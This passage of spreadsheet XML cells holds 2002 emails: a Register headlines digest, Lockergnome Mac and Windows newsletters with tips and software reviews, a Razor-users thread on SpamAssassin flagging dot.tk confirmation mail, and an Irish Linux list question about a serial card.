    <t>Reg Subscribers &lt;update@list.theregister.co.uk&gt;</t>
  </si>
  <si>
    <t>Reg Headlines Wednesday July 17</t>
  </si>
  <si>
    <t>Today's Headlines from The Register\n-----------------------------------\n\n    To unsubscribe from this daily news update, see the instructions at\n    the end of this message.\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Software\n\n    Ballmer 'fesses up to Linux/Windows cost FUD\n    Just can't keep that myth alive\n        [URL]http://www.theregister.co.uk[/URL]\n\n    Microsoft backs Web services security standard\n    Security Assertion Markup Language\n        [URL]http://www.theregister.co.uk[/URL]\n\n    Liberty Alliance unveils secure sign-on specs\n    Authentic\n        [URL]http://www.theregister.co.uk[/URL]\n\n    Peru mulls Free Software, Gates gives $550k to Peru Prez\n    Funny old life...\n        [URL]http://www.theregister.co.uk[/URL]\n\n    Unisys takes high and middle roads with new ES7000s\n    Twin product streams\n        [URL]http://www.theregister.co.uk[/URL]\n\n    Microsoft lifts veil on Corona media platform\n    Ooh, you tease\n        [URL]http://www.theregister.co.uk[/URL]\n\n    MS to ship Media Center 'special edition' of XP in Q4\n    It's that remote control unit called Freestyle really...\n        [URL]http://www.theregister.co.uk[/URL]\n\nEnterprise Systems\n\n    Soft landing for firms caught in Web host fallout?\n    Silver lining\n        [URL]http://www.theregister.co.uk[/URL]\n\n    IBM sends Shark into feeding frenzy\n    Storage price wars\n        [URL]http://www.theregister.co.uk[/URL]\n\n    HP pulls plug on enterprise software lines\n    No Net Action\n        [URL]http://www.theregister.co.uk[/URL]\n\nPersonal Hardware\n\n    PC makers to start taking the Tablets\n    Mira Image\n        [URL]http://www.theregister.co.uk[/URL]\n\nSemiconductors\n\n    Nvidia intros nForce 2 \n    The chipset formerly known as Crush 18\n        [URL]http://www.theregister.co.uk[/URL]\n\n    Fears emerge over Intel job cuts \n    Fab 17 for the chop?\n        [URL]http://www.theregister.co.uk[/URL]\n\nInternet\n\n    HP suspends 100+UK staff in email porn probe\n    ExclusiveFiring squad\n\n        [URL]http://www.theregister.co.uk[/URL]\n\n    We don't need no stinking ID cards\n    Privacy International FAQ\n        [URL]http://www.theregister.co.uk[/URL]\n\n    Govt unveils plans for eDemocracy\n    Just 'elastoplast for a sickly politics'\n        [URL]http://www.theregister.co.uk[/URL]\n\n    MPEG 4 is go (licence fees capped)\n    Apple dances Quicktime 6 gig\n        [URL]http://www.theregister.co.uk[/URL]\n\n    UK2.net suffers outage\n    Like an 'alien abduction'\n        [URL]http://www.theregister.co.uk[/URL]\n\n    TFI wants suspended ISP service 'to be sorted'\n    The Free Internet liquidation has 'no bearing'\n        [URL]http://www.theregister.co.uk[/URL]\n\n    Yahoo! censors portal, kisses Beijing's ass\n    Mmmm, good!\n        [URL]http://www.theregister.co.uk[/URL]\n\nNet Security\n\n    Snouts in the honeypot\n    Get your Digital Ant Farm here. Only $50K\n        [URL]http://www.theregister.co.uk[/URL]\n\n    US Congress approves life terms for crackers\n    Bill aims to turn ISPs into snitches\n        [URL]http://www.theregister.co.uk[/URL]\n\n    Gweeds gets killed\n    Letters Too easy by half\n\n        [URL]http://www.theregister.co.uk[/URL]\n\n    O2 security bubble pricked\n    Lame coding error gives up u/n, pw\n        [URL]http://www.theregister.co.uk[/URL]\n\nAnti-Virus News\n\n    Frethem worm poses as Password file\n    More shenanigans\n        [URL]http://www.theregister.co.uk[/URL]\n\nBusiness\n\n    Ballmer 'fesses up to Linux/Windows cost FUD\n    Just can't keep that myth alive\n        [URL]http://www.theregister.co.uk[/URL]\n\n    Banks seal Energis takeover \n    Norman conquest\n\n        [URL]http://www.theregister.co.uk[/URL]\n\n    NAI sweetens McAfee.com bid \n    A spoonful of sugar makes the poison pill go down\n        [URL]http://www.theregister.co.uk[/URL]\n\ne-business\n\n    Microsoft backs Web services security standard\n    Security Assertion Markup Language\n        [URL]http://www.theregister.co.uk[/URL]\n\n    Liberty Alliance unveils secure sign-on specs\n    Authentic\n        [URL]http://www.theregister.co.uk[/URL]\n\nThe Mac Channel\n\n    MPEG 4 is go (licence fees capped)\n    Apple dances Quicktime 6 gig\n        [URL]http://www.theregister.co.uk[/URL]\n\nChannel Flannel\n\n    Sun UK resellers under email siege\n    And told to stay away from France\n        [URL]http://www.theregister.co.uk[/URL]\n\nSite News\n\n    Reg Hackerettes - The jury delivers its verdict\n    You spoke, we listened\n        [URL]http://www.theregister.co.uk[/URL]\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The Register and its contents are copyright 2002 Situation Publishing.\nAll rights reserved.\n\n    Tel:     +44 (0)20 7499 2264.\n    Fax:     +44 (0)20 7493 5922.\n    E-Mail:  press.releases@theregister.co.uk\n\nTo unsubscribe from these daily updates, visit the following URL.  Make\nsure that you enter exactly the same e-mail address as you used to join\nthis service.\n\n    [URL]http://list.theregister.co.uk[/URL]</t>
  </si>
  <si>
    <t>www.neverfailgroup.com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www.neverfailgroup.com http://list.theregister.co.uk</t>
  </si>
  <si>
    <t>To: qqqqqqqqqq-lg@example.com\nFrom: Lockergnome Apple Core &lt;subscriptions@lockergnome.com&gt;\nDate: Wed, 17 Jul 2002 01:49:41 -0500</t>
  </si>
  <si>
    <t>Wed, 17 Jul 2002 01:49:41 -0500</t>
  </si>
  <si>
    <t>Lockergnome Apple Core &lt;subscriptions@lockergnome.com&gt;</t>
  </si>
  <si>
    <t>[Lockergnome Apple Core]  Intuitive Cash</t>
  </si>
  <si>
    <t>![Lockergnome]([URL]http://images.lockergnome.com[/URL] ![See You\nat Gnomedex\n2002!]([URL]http://www.lockergnome.com[/URL]  \n  \n---  \n|\n\n  07.16.2002 GnomeREPORT  \n  \n---  \n  \n**Content Management Is Key:** Need a reason your boss should be sending you\nto Gnomedex? Some of the leading experts on content management solutions\n(those things we affectionately call blogs) will be sharing the future of\nblogging and how you can adapt it to both the way you do business and the way\nyou communicate in general. Join Evan Williams and Doc Searls as they share\npearls of wisdom on blogging, Linux and other open source applications that\nare changing our lives. If that's not enough incentive, remind the boss that\nTHE Internet security guru, Steve Gibson, will be sharing his wisdom as well.\nRegister for Gnomedex today!  \n---  \n  \nOf the comments I received on AppleScript, every single one suggested I start\nwith the basics, for that reason, I'm going to take things step-by-step,\nfollowing my own learning process and progressing to gradually more difficult\nconcepts. Despite having experience in programming, using a variety of\nlanguages, I initially found AppleScript to be quite intimidating -- mostly\nbecause something about the Script Editor seems less than intuitive. If you've\nalready been dabbling in scripting, the first few columns on the subject will\ndefinitely be targeted at novices, but I want to everyone to have the chance\nto get up to speed.\n\nI'm off to the Shareware Industry Conference for the remainder of the week,\nwhere it's looking like the selection of stuff for Mac users will be very\nbleak. I believe the organization is targeted more toward the Windows\ncommunity in general and any shareware developer with enough cash to get there\nis probably going to be in New York for MacWorld. I'll be missing out on the\nWeb cast of Steve Jobs speech, which is scheduled to take place while I'm in\nthe car, but at least I'll be able to catch the details at other Mac sites\nwhen I get to St. Louis. Internet access for the trip is being provided by\nCrosspaths.net, which is one of the few dialup services I've found that can be\nconfigured to relay my Lockergnome mail so that I can still function on the\nroad. I tested the service on my iBook this evening just to be sure.\n\nWith some luck, I may be able to get Internet access from the highway, via my\nKyocera 6035, and see what Jobs had to say before I get to St. Louis.\nUnfortunately, there's no support for OS X yet with the 6035, so I can't use\nthe unlimited nights and weekends to dial the Web from my laptop. A landline\nwill probably be more sensible anyway. Check my blog for some updates on the\ntrip, Lori's attending too and I'm sure she'll be taking lots of photos, as\nusual.\n\nSee You in August,  \nJake Ludington  \n\n  \n\n GnomeDOWNLOADS  \n  \n---  \n  \n**Same-X v2.0 [1.73MB] OSX 10.1.1 FREE**\n\n[URL]http://www.thumpbunny.com[/URL]\n\nSeven themes, two board sizes and your choice of difficulty levels, makes this\na game for the entertainment addict in all of us. The object is to clear the\nboard of all icons, removing them in matching clusters of two or greater at a\ntime. Clearing the screen awards bonus points and scoring awards clearing of\nlarger clusters. Nothing gets killed, there's no swearing, but you'll find\nyourself addicted to the mindless fun anyway -- not to mention you can feel\nsafe sharing this with kids.\n\n  \n\n GnomeNETWORK  \n  \n---  \n  \n**Samba Sharing Package v1.5 [8.3MB] OS X FREE**\n\n[URL]http://xamba.sourceforge.net[/URL]\n\nIt remains to be seen whether 10.2 will render this type of application\nunnecessary, but for those out there without the cash to spend on DAVE, for\nsmall office or home networking of Mac/PC mixed environments, this is the only\nreal alternative. Installation and configuration is almost painless, making it\neasy for your Windows machine to see apps on your Mac with little difficulty.\nThe interface, like most OS X GUI apps, is quite easy to navigate, including\nuser management, connection management, and share configuration into a\nconvenient Prefernce pane.\n\n  \n\n GnomeSCRIPT  \n  \n---  \n  \nTechnically speaking, you could do most of your script writing in a text\nediting application like TextEdit, but ultimately you've got to compile it in\nthe Script Editor, so you might as well start there. The Script Editor is\nlocated in the AppleScript subfolder of your Applications folder. Opening the\napplication for the first time reveals a small window divided in to two\nsections, Description and the actual scripting pane, separated by a group of\nbuttons.\n\nIgnore the buttons for the moment and concentrate on the two text panes. The\nDescription pane is where you label your script, so you can remember later\nwhat it does. This is also the place you denote the key combination that will\ninvoke your script. If you choose to save your script as an executable\napplication, the information in the description will show up in the start up\nscreen.\n\nThe second pane is where the magic happens. In this pane you will be telling\napplications to do specific tasks when your script runs. The format for\nscripting is fairly linear. You either start your script at the top most level\ndrilling down, until you actually reach the application or object you want to\nmanipulate with your script, or you take the reverse approach manipulating\nthings from the bottom up. Telling the "Applications" folder to tell its\n"Jake" subfolder to tell the application "Jake's Media Player," located in\nthat folder to do something could also be written by telling the script to\naccess "Jake's Media Player" located in the "Jake" subfolder of the\n"Applications folder, The upcoming example will make this a bit more clear.\n\n**Buy One Inkjet Cartridge - GET TWO FREE!!** Buy 1 Get 2 FREE on Most Epson,\nCanon, and Apple Cartridges. Wholesale Pricing on Lexmark Cartridges. Free\nShipping on orders $25 or more!! U.S. Shipping Only. Click Here For a Complete\nList of Cartridges.  \n---  \n  \n  \n\n GnomeFAVORITE  \n  \n---  \n  \n**Glitschka.com**\n\n[URL]http://www.glitschka.com[/URL]\n\nFlash animations, downloadable icons, artistic doodles, and details about the\nartist himself are available from this site. You're guaranteed to find\nsomething entertaining here, and if you need a logo designed, Von Robert\nGlitschka might even take you on as a client. The portfolio is extensive,\nincluding stock images and even some icons by the artist's seven year old\ndaughter. A must read is the anatomy of an illustration section, which lays\ndown artistic opinion, straight from Glitschka's mouth on how to make a funny\ncreation. This is by no means a Mac only site, the entertainment is accessible\nby everyone and icons are available in both Mac and PC versions.\n\n  \n\n GnomeTIP  \n  \n---  \n  \nTraditionally, Mac OS has always placed a link to various disks in use on the\ndesktop, which can be convenient, but is no longer necessary with the Finder\nonly a Command+Tab away in the Dock. My personal desktop is usually cluttered\nwith files I've downloaded from the Internet, so I can never find anything\nwhen my desktop is in plain sight, the Finder is the only way I stay\norganized. For desktop slobs like me, or for neat freaks who want nothing on\nthe desktop, OS X includes three handy options for keeping disks in their\nplace. Open the Finder Preferences window and uncheck the three checkboxes\nunder Show these items on the Desktop. You'll have more space for other icons\nto clutter the desktop or in the case of you clean folk, you'll have nothing\nat all.\n\nTip by Jake\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 Top 50 Fun Sites  \n Must-Know Tech Terms  \n Top 50 Useful Sites  \n Top 75 Tech Sites  \n Top 50 PenguinCORE  \n Top 50 PenguinTWEAKS  \n\n![See You in\nAugust!]([URL]http://chris.pirillo.com[/URL]\n\n Tell a Friend About Us!  \n Suggest a Feature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n General Feedback  \n E-mail the Editors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www.lockergnome.com http://www.thumpbunny.com http://xamba.sourceforge.net http://www.glitschka.com http://www.lockergnome.com http://chris.pirillo.com http://www.lockergnome.com</t>
  </si>
  <si>
    <t>To: qqqqqqqqqq-lg@example.com\nFrom: Lockergnome Windows Daily &lt;subscriptions@lockergnome.com&gt;\nDate: Wed, 17 Jul 2002 00:40:10 -0500</t>
  </si>
  <si>
    <t>Wed, 17 Jul 2002 00:40:10 -0500</t>
  </si>
  <si>
    <t>Lockergnome Windows Daily &lt;subscriptions@lockergnome.com&gt;</t>
  </si>
  <si>
    <t>[Lockergnome Windows Daily]  Medieval Mocha</t>
  </si>
  <si>
    <t>![Lockergnome]([URL]http://images.lockergnome.com[/URL]\n![10354]([URL]http://www.winnetmag.com[/URL]![]([URL]http://ad.linksynergy.com[/URL]\nbin/show?id=vdKWfulJxTQ&amp;bids=36698.10000263&amp;type=4&amp;subid=0)  \n  \n---  \n|\n\n  07.17.2002 GnomeREPORT  \n  \n---  \n  \n**FREE COLOR PRINTERS FROM XEROX - $4,500 VALUE** Enroll in the Xerox\nFreeColorPrinters program and get a Phaser network color printer for FREE.\nSmall businesses, schools and non-profits have been participating in this risk\nfree program since 1999. Learn more.  \n---  \n  \nFalling asleep at the wheel is no laughing matter. Still, it kinda happened\nwith yesterday's tip. I forgot to mention that the String value's label is\n"Logging" (sans quotes). That was almost like a cliffhanger, eh? The oversight\nwas totally my fault. I've been thinking about asking Gretchen and Brian to\nhelp with future reviews. Don't be surprised if that happens soon. I'm sure\nyou'd welcome a female perspective on this stuff, right? She helped one of our\nlandlords pick a paint color for the "office" wall this evening. Does that\nqualify her to talk about cool stuff that we find for you on the Internet? You\nbetcha. Let's see how she does with the drapes and rugs. I have a feeling I'll\nbe the one tweaking furniture layout. Shouldn't be too much of an issue - yet.\nI wonder if Ikea has an affiliate program?\n\nI've mentioned how Yahoo Mail's beta is mangling our commas, but did you know\nthat it's also (possibly) rewriting your e-mail? If you send an HTML message\nto someone who has a yahoo.com account, something may get lost in the\ntranslation. Try sending this sentence: "My medieval mocha has an expression\nto evaluate." Again, be sure this note is sent in HTML format. The results\nwill surprise you. As far as I can tell, they're doing this to stop any\nscripts from being distributed to their user base. I must credit Marion\nSchroll for making me aware of the "problem." It's kinda funny, in a weird\nsort of way. Not that I would want anything I send changed in any way, shape,\nor form. It begs the question: what next? I mean, where does it all stop? Give\nthem a bit, and they just might take a byte. Censorship is only a stone's\nthrow away.\n\nI really feel for Lockergnomie Sharon Clark, who asks: "What is this crazy\nbusiness with the broadband metering? What they advertise doesn't seem to be\nwhat you get. Now that I'm forking out $60 per month for a supposed metered\nrate of 640 down / 320 up, I'm feeling clueless and left out in the cold. Not\nsure what I'm paying for, not sure what's going on at the office, not sure if\nI'm capped, not sure if I'm getting ripped off! Can you help me out here? I'm\nfeeling lied to; why can't I download 'til my 40 gig is full? That is what\nthey promised me and that is what I THOUGHT I was paying for. I want\nconsistent speed - is this too much to ask?" It's not too much to ask the\nquestion, but it's probably too much to get the answer. I'm facing the same\ndilemma right now, even though cable-based connectivity isn't available in my\narea. Expect more and more "filters" to be put in place as time marches on.\nWatch those EULAs, folks.\n\nSee You in August,  \nChris Pirillo  \n\n  \n\n GnomeDOWNLOADS  \n  \n---  \n  \n|  | **Latest Downloads**  \n---  \nAntiVir PE 6.14.00.63  \nMP3 Rename 7.1.4.0  \nOE-QuoteFix 1.15.5  \nAntiVir PE f 6.14.00.63  \nMyKazaa 1.0  \nEraseTemp 3.1.0.2  \nZAP Audio Player 1.20  \nPocoMail 2.61.1056  \nWebserver Stress 5.3.4  \nPhotoMeister 1.04  \nPopupWar 3.0.75  \nDisk Triage 6.3.1.0  \nBroccoli ADS 2.0  \nMail REDirect 1.3.240  \nMindex Image Vie 2.7.16  \n  \n**Directory Lister v0.5.2 [547k] W9x/2k/XP FREE**\n\n[URL]http://freeware.prv.pl[/URL]\n\n{List directory contents} When I was younger, I'd get so frustrated at those\ngames where you'd have to pick out all of the subtle differences between two\npictures. I'd always end up with one or two that I just could never see. When\nI want to do the same type of comparison between two directories on my\ncomputer, I use Directory Lister and I never miss a thing. Not only does\nDirectory Lister display the contents of your chosen directories, it will also\nlet you save the output to an HTML file. This is great for web developers who\nwant a quick way to list the contents of a ZIP file before archiving it and\nuploading it to their website. As an added bonus, Directory Lister also shows\nthe date, time, and attributes of the files in your directory, making it\neasier than ever to compare the differences in files between two directories.\n\n  \n**Web Calendar [25k] W2k/XP FREE**\n\n[URL]http://members.lycos.co.uk[/URL]\n\n{Web page reminder} Surfing the web as much as I do, I'll occasionally run\ninto a site or page that commits the horrendous faux pas of displaying an\n"Under Construction" banner. I COULD forget about the site and maybe somehow\nencounter it later, or I COULD drop the site into Web Calendar and have this\nhandy-dandy app remind me to check the page again in a week. The same\ntechnique holds true for my normal browsing... for example, I can use Web\nCalendar to remind me to check out the Digital Media newsletter every morning,\nor to check Amazon for a CD that I know will be released in a week. Now, I\nwill have no excuse for missing the DVD release of "Lord of the Rings"...\n\nRecommend It!\n\n  \n\n GnomeCLICKS  \n  \n---  \n  \n![TECHNOLOGY can be frustrating for new and intermediate computer users, UNTIL\nNOW. Join us for a FREE Windows Newsletter, video tutorials, articles, special\nreports, and\nmore!]([URL]http://www.lockergnome.com[/URL] | ![The\neasiest way to Zip/UnZip. An AWARD-WINNING file compression utility featuring\nquick backup, batch processing, Windows integration and SUPPORTS 15 archive\nformats \(ACE, RAR, etc\).]([URL]http://www.picozip.com[/URL] |\n![Handy Backup]([URL]http://www.lockergnome.com[/URL] |\n![Secure your\nE-Mail!]([URL]http://www.lockergnome.com[/URL] |\n![Shortcut to\nRDesk.exe]([URL]http://www.capitalintellect.net[/URL] |\n![IPCheck Server Monitor monitors a network using various protocols \(e.g.\nping, http, smtp, ftp\) and notifies the staff in various ways as soon as an\noutage occurs.]([URL]http://www.lockergnome.com[/URL] |\n![Share your team/project contacts, calendars, tasks, etc. in MS Oulook 2002,\nwithout a\nserver!]([URL]http://www.lockergnome.com[/URL]  \n---|---|---|---|---|---|---  \n  \n  \n\n GnomeSYSTEM  \n  \n---  \n  \n**SQLView v2.1.0.20 [5.2M] W9x/2k/XP FREE**\n\n[URL]http://mywebpages.comcast.net[/URL]\n\n{View ODBC Output} SQLView is "A SQL Database viewing utility. (It)\nautomatically detects all available ODBC data sources and displays them in an\nexplorer-like tree. User(s) may double-click on data sources to access the\ndatabases, browse tables, execute custom queries and export (the) data to .CSV\nor .XML files." I didn't really have much on my machine to throw at this\nprogram. However, the one data source I did have (mostly related to Music CD\ncreation) displayed perfectly in SQL View. (And I have the .csv file to prove\nit! Nyah!)\n\nRecommend It!\n\n  \n\n GnomeWILDCARD  \n  \n---  \n  \n**CollegeBAR v8.0 [5.9M] W9x/2k/XP US$20**  \nUnearthed by Shawn Verrall\n\n[URL]http://www.pracx.com[/URL]\n\n{Mix your own drinks} When I was in college, my room used to be known as "The\nBar." It may have had something do with my L-shaped desk that resembled a bar,\nand the fact that I had seen the movie Cocktail too many times and wanted to\nbe a bottle-flipping bartender. I never achieved my goal of being the world's\nbest geek bartender, but maybe with College Bar I could have. College Bar\ncontains recipes for over 11,600 drinks. With an online update feature, you\ncan download new drinks as they become available... or you can add your own\ncreative concoctions to the database! College Bar also has a calculator to\ndetermine someone's blood alcohol level... drink responsibly, folks. As an\nadded bonus, you can load some of your favorite party pictures into the\nprogram and you'll see a slide show of those pictures - a great way to\nremember the good times... unless you don't remember experiencing them in the\nfirst place, that is. Dude, where's my car?\n\nSubmit Your Thoughts | Recommend It!\n\n  \n\n GnomeFAVORITE  \n  \n---  \n  \n**Buy One Inkjet Cartridge - GET TWO FREE!!** Buy 1 Get 2 FREE on Most Epson,\nCanon, and Apple Cartridges. Wholesale Pricing on Lexmark Cartridges. Free\nShipping on orders $25 or more!! U.S. Shipping Only. Click Here For a Complete\nList of Cartridges.  \n---  \n  \n**Beliefnet**\n\n[URL]http://www.beliefnet.com[/URL]\n\n{Daily enlightenment} Whether you're Buddhist, Hindu, Muslim, Christian,\nJewish, or anything else, Beliefnet.com has something for you. You can sign up\nfor any of the ten Beliefnet newsletters - there's even one devoted to\nreligious jokes. However, if you aren't looking for enlightenment for your\nInbox, then just feel free to browse around. You're sure to find something\ninteresting in the Inspiration section; the Parenting section has helpful\nfeatures and articles. Or, test your savvy with "Stump Our Bible Expert." If\nyou're seeking something new in the way of your spirituality, or are looking\nfor some affirmations of your existing beliefs, it's likely you'll find it at\nBeliefnet.\n\nRecommend It!\n\n  \n\n GnomeTIP  \n  \n---  \n  \nI am a sucker for keyboard shortcuts. Anything that can save me from using the\nmouse is good in my book. Occasionally I like to view the web or Windows\nExplorer in Full Screen mode... to do this I just hit F11 on the keyboard and\nthere I am in Full Screen mode. Hit it again and I am back to regular mode. If\nyou aren't as much of a fan of keyboard shortcuts as me, then all you have to\ndo is press and hold the Ctrl key while clicking on the Maximize button and\nyou will have the same effect. You will notice, however, that your Start Menu\nisn't anywhere to be seen. Never fear, another keyboard shortcut is here...\njust press Ctrl key plus the Esc key and your Start Menu will be back where it\nbelongs. Alternatively, if you have a Windows key on your keyboard you can use\nthat key to bring up your Start Menu as well.\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Our Tip Files  \n\n Latest Windows Daily  \n Latest Digital Media  \n Latest Tech Specialist  \n Latest Penguin Shell  \n Latest Apple Core  \n Latest Web Weekly  \n Latest Bits &amp; Bytes  \n\n Find the Lowest Price  \n\n Suggest a Feature  \n Advertise With Us  \n The GnomeSTORE  \n High-Tech Job Search  \n Chat With Gnomies  \n Watch The Webcams  \n Computer Power User  \n\n Read Past Issues  \n Download X-Setup  \n About Lockergnome  \n Our Privacy Policy  \n View More Options  \n Our XML / RSS Feed  \n Syndicate Our Tips  \n Link To Lockergnome  \n Get Chris's Book  \n\n Tell a Friend About Us!  \n\n General Feedback  \n E-mail the Editor  \n The Editor's Blog  \n\n\n\nSEARCH  \n  \n---  \n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HAPPY FUN STUFF  \n  \n---  \n  \nAnd now, we see how Sprocket thinks he has a right to eat pumpkin seeds. Or,\nwould that be "pupkin" seeds?\n\nNot for the Puppy\n\n\n\n![Lockergnome Webcam\nImage]([URL]http://www.lockergnome.com[/URL]  \n---  \nCLICK HERE TO ZOOM  \n  \n\n\n![]([URL]http://images.lockergnome.com[/URL]\n\n\n\nBYTE ME NOW  \n  \n---  \n  \n(C)2002, Lockergnome LLC. ISSN: 1095-3965. All Rights Reserved. Please read\nour Terms of Service. Our Web site is hosted by DigitalDaze. Domain registered\nat DNS Central.  The "ZIP" in Zip Code stands for "Zoning Improvement Plan."\n\n</t>
  </si>
  <si>
    <t>http://images.lockergnome.com http://www.winnetmag.com http://ad.linksynergy.com http://freeware.prv.pl http://members.lycos.co.uk http://www.lockergnome.com http://www.picozip.com http://www.lockergnome.com http://www.lockergnome.com http://www.capitalintellect.net http://www.lockergnome.com http://www.lockergnome.com http://mywebpages.comcast.net http://www.pracx.com http://www.beliefnet.com http://www.lockergnome.com http://www.lockergnome.com http://images.lockergnome.com</t>
  </si>
  <si>
    <t>To: mail@vipul.net\nFrom: "Craig R.Hughes" &lt;craig@deersoft.com&gt;\nDate: Wed, 14 Aug 2002 22:57:17 -0700</t>
  </si>
  <si>
    <t>Wed, 14 Aug 2002 22:57:17 -0700</t>
  </si>
  <si>
    <t>"Craig R.Hughes" &lt;craig@deersoft.com&gt;</t>
  </si>
  <si>
    <t>mail@vipul.net</t>
  </si>
  <si>
    <t>Re: [Razor-users] dot-tk registrations hitting Razor</t>
  </si>
  <si>
    <t>Hmm, tricky because we've got Razor1 and Razor2 rolled into one \nrule.  Probably should break them out as separate rules anyway \nso they can get different scores, etc.  Not too hard to do, but \nit's nearly 11pm so I'll see if I can get to it tomorrow.\n\nC\n\nOn Wednesday, August 14, 2002, at 05:39  PM, Vipul Ved Prakash wrote:\n\n&gt; Justin, can SA say "Listed in Razor2" when using Razor2? I get a lot of\n&gt; reports that are misreports to Razor1 not Razor2.\n&gt;\n&gt; If this is Razor2, then revocation will fix the problem.\n&gt;\n&gt; cheers,\n&gt; vipul.\n&gt;\n&gt; On Wed, Aug 14, 2002 at 11:56:26AM +0100, Justin Mason wrote:\n&gt;&gt;\n&gt;&gt; As the proud new owner of a free antarc.tk domain ;), I got a \n&gt;&gt; confirmation\n&gt;&gt; mail, which fell into Razor.\n&gt;&gt;\n&gt;&gt; Looks like the fuzzy matching will hit on all confirmation mails until\n&gt;&gt; it's whitelisted.\n&gt;&gt;\n&gt;&gt; just fyi,\n&gt;&gt;\n&gt;&gt; --j.\n&gt;&gt;\n&gt;&gt; ------- Forwarded Message\n&gt;&gt;\n&gt;&gt; Date:    Wed, 14 Aug 2002 11:37:35 -0000\n&gt;&gt; From:    support@dot.tk (Dot TK registration center)\n&gt;&gt; To:      xxxxxx@xxxxx.xxx\n&gt;&gt; Subject: *****SPAM***** Please confirm your free registration\n&gt;&gt;\n&gt;&gt; SPAM: -------------------- Start SpamAssassin \n&gt;&gt; results ----------------------\n&gt;&gt; SPAM: This mail is probably spam.  The original message has \n&gt;&gt; been altered\n&gt;&gt; SPAM: so you can recognise or block similar unwanted mail in future.\n&gt;&gt; SPAM: See [URL]http://spamassassin.org[/URL] for more details.\n&gt;&gt; SPAM:\n&gt;&gt; SPAM: Content analysis details:   (7.5 hits, 7 required)\n&gt;&gt; SPAM: SEE_FOR_YOURSELF   (2.8 points)  BODY: See for yourself\n&gt;&gt; SPAM: SPAM_PHRASE_13_21  (1.5 points)  BODY: Contains phrases \n&gt;&gt; frequently found in spam\n&gt;&gt; SPAM: RAZOR_CHECK        (3.0 points)  Listed in Razor, see \n&gt;&gt; [URL]http://razor.sourceforge.net[/URL]\n&gt;&gt; SPAM: MSG_ID_ADDED_BY_MTA_3 (0.2 points)  'Message-Id' was \n&gt;&gt; added by a relay (3)\n&gt;&gt; SPAM:\n&gt;&gt; SPAM: -------------------- End of SpamAssassin \n&gt;&gt; results ---------------------\n&gt;&gt;\n&gt;&gt;\n&gt;&gt; Malo ni!\n&gt;&gt; and thank you (faka fetai)\n&gt;&gt; for registering with Dot TK!\n&gt;&gt;\n&gt;&gt; Your e-mail address : xxxxxxx@xxxxx.xxx\n&gt;&gt; password: xxxxxxxxx\n&gt;&gt;\n&gt;&gt; confirmation code: xxxxxxx\n&gt;&gt; (please note: this is not your password)\n&gt;&gt;\n&gt;&gt; As you know we like to keep things simple, so all you need\n&gt;&gt; to do to activate your Dot TK address is...\n&gt;&gt;\n&gt;&gt; 1. Go to [URL]http://my.dot.tk[/URL]\n&gt;&gt;\n&gt;&gt; 2. And enter your confirmation code\n&gt;&gt;\n&gt;&gt; If you have received this email, but did not join us @ Dot TK,\n&gt;&gt; then somebody tried to register using your e-mail address.\n&gt;&gt;\n&gt;&gt; You can simply ignore this message... But why not come on in,\n&gt;&gt; and see for yourself if your own -free- domain name is still\n&gt;&gt; available at [URL]http://www.dot.tk[/URL]\n&gt;&gt;\n&gt;&gt; Any questions? Please visit our feedback page at\n&gt;&gt; [URL]http://www.dot.tk[/URL]\n&gt;&gt; Hope to see you soon at Dot TK.\n&gt;&gt;\n&gt;&gt; Dot TK -- Dividing Domains Differently.\n&gt;&gt;\n&gt;&gt;\n&gt;&gt;\n&gt;&gt; ------- End of Forwarded Message\n&gt;&gt;\n&gt;&gt;\n&gt;&gt;\n&gt;&gt; -------------------------------------------------------\n&gt;&gt; This sf.net email is sponsored by: Dice - The leading online job board\n&gt;&gt; for high-tech professionals. Search and apply for tech jobs today!\n&gt;&gt; [URL]http://seeker.dice.com[/URL]\n&gt;&gt; _______________________________________________\n&gt;&gt; Razor-users mailing list\n&gt;&gt; Razor-users@lists.sourceforge.net\n&gt;&gt; [URL]https://lists.sourceforge.net[/URL]\n&gt;\n&gt; --\n&gt;\n&gt; Vipul Ved Prakash          |   "The future is here, it's just not\n&gt; Software Design Artist     |    widely distributed."\n&gt; [URL]http://vipul.net[/URL]          |              -- William Gibson\n&gt;\n&gt;\n&gt;\n&gt; -------------------------------------------------------\n&gt; This sf.net email is sponsored by: Dice - The leading online job board\n&gt; for high-tech professionals. Search and apply for tech jobs today!\n&gt; [URL]http://seeker.dice.com[/URL]\n&gt; _______________________________________________\n&gt; Razor-users mailing list\n&gt; Razor-users@lists.sourceforge.net\n&gt; [URL]https://lists.sourceforge.net[/URL]\n&gt;\n&gt;</t>
  </si>
  <si>
    <t>http://spamassassin.org http://razor.sourceforge.net http://my.dot.tk http://www.dot.tk http://www.dot.tk http://seeker.dice.com https://lists.sourceforge.net http://vipul.net http://seeker.dice.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: ILUG &lt;ilug@linux.ie&gt;\nFrom: Shane Kennedy &lt;skenn@indigo.ie&gt;\nDate: Wed, 14 Aug 2002 22:52:37 +0100</t>
  </si>
  <si>
    <t>Wed, 14 Aug 2002 22:52:37 +0100</t>
  </si>
  <si>
    <t>Shane Kennedy &lt;skenn@indigo.ie&gt;</t>
  </si>
  <si>
    <t>[ILUG] Serial port trouble</t>
  </si>
  <si>
    <t>Hi,\n    Can anyone offer me any advice on using an MRi dual port PCI - serial\ncard.  MRi claim it works, but that not at 9600 baud.  I AM using it at\n9600, but I get a 10s delay on output, followed by just 16 bytes,\nrepeated untill complete.  Similarly, on input, I get a delay before the\napp' sees the data.\n\nTIA\nShane\n\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Gary Peck &lt;garyp@uclink.berkeley.edu&gt;\nDate: Wed, 14 Aug 2002 20:57:27 -0700</t>
  </si>
  <si>
    <t>Wed, 14 Aug 2002 20:57:27 -0700</t>
  </si>
  <si>
    <t>Gary Peck &lt;garyp@uclink.berkeley.edu&gt;</t>
  </si>
  <si>
    <t>Re: Gstreamer Repository</t>
  </si>
  <si>
